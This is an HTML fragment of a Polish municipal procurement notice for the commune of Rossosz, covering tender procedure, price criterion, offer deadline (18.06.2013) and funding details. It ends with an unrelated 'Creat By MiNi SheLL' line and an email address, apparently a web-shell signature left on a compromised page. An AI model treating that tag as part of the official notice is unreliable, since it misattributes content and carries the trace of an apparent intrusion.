<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rossosz.bip.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wójt Gminy Rossosz, 21-500 Biała Podlaska ul. Lubelska 8 pokój nr 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.06.2013 godzina 11:00, miejsce: Wójt Gminy Rossosz, 21-500 Biała Podlaska ul. Lubelska 8 pokój nr 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie  dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com